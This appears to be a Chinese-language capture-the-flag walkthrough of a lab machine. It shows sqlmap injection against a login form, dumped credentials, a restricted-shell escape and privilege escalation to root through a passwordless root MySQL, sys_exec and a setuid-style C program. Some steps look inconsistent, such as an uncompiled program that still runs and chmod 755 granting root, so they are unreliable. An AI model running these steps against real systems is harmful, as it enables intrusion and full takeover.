1、ifconfig、netdiscover、nmap掃描獲取網絡信息,發現了samba服務,用metasploit溢出試試。
2、打開網站http://192.168.216.147,一個登入框,試了萬能密碼,登入不進去。
3、通過metasploit的測試,發現溢出並不成功,但是發現使用的是samba3.0.28, Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.28a) 在exploit_db上搜索,並沒有發現可以利用的。看來只能從網站入手了。
4、使用brupsuite查看到登入功能使用post提交數據,數據為:myusername=admin&mypassword=admin&Submit=Login。
5、sqlmap 使用POST方法提交
sqlmap -u “192.168.216.147/checklogin.php” –data “myusername=admin&mypassword=admin&Submit=Login” –level=5 –risk=3 –dbs
available databases [3]: [*] information_schema [*] members [*] mysql
6~7 、存在注入,收集信息。
8、看來是入侵成功了,那后面的就是暴數據了。
+———-+
| username |
+———-+
| john |
| robert |
+———-+
+———————–+
| password |
+———————–+
| MyNameIsJohn |
| ADGAdsafdfwt4gadfga== |
+———————–+
9、看來john可以利用啊
10、使用john居然登入不了網站,那這個密碼ssh的?試試。
11、登入成功了,但是不能使用任何命令,連id等不行。但是他提示使用?和
help可以。使用?發現能使用的命令只有cd clear echo exit help ll lpath ls。
12、通過google查到: If commands are limited, you break out of the “jail” shell? python -c ‘import pty;pty.spawn(“/bin/bash”)’ echo os.system(‘/bin/bash’) /bin/sh -i
13、既然echo可以使用,使用上面的語句執行后能正常運行其他命令了,又到了提權部分,這部分一直是弱項。。埃。。。
14、查看進程發現: root 4781 0.4 9.6 127448 24684 ? Sl 12:10 0:32 /usr/sbin/mysql
mysql的執行權限居然是root。
15、mysql連接: mysql -h localhost -u root,居然直接進入了,沒密碼。
16、記得mysql可以執行系統命令,使用方法為:system 或者\!;
17、實驗下,使用system id:發現: mysql> system id; uid=1001(john) gid=1001(john) groups=1001(john) mysql> system whoami john
還是john。。。fck。。;
18、最后實在不知道怎么辦了,只好求教了。看了教程,上面使用的是 SELECT sys_exec(‘touch /tmp/thisisatest’);能成功,而且是root權限。
19、按照教程寫了溢出程序在目標主機的/tmp/目錄下: int main() { setresuid(0, 0, 0); setresgid(0, 0, 0); system( “/bin/bash” ); return 0; }
編譯(不知道為啥,沒有gcc程序,沒辦法)。
20,這個exploit的程序執行權限只是john,使用mysql更改權限。
21、命令:
SELECT sys_exec(‘chown root.root /tmp/exploit’) SELECT sys_exec(‘chmod 755 /tmp/exploit’);
22、執行溢出exploit,獲得root權限。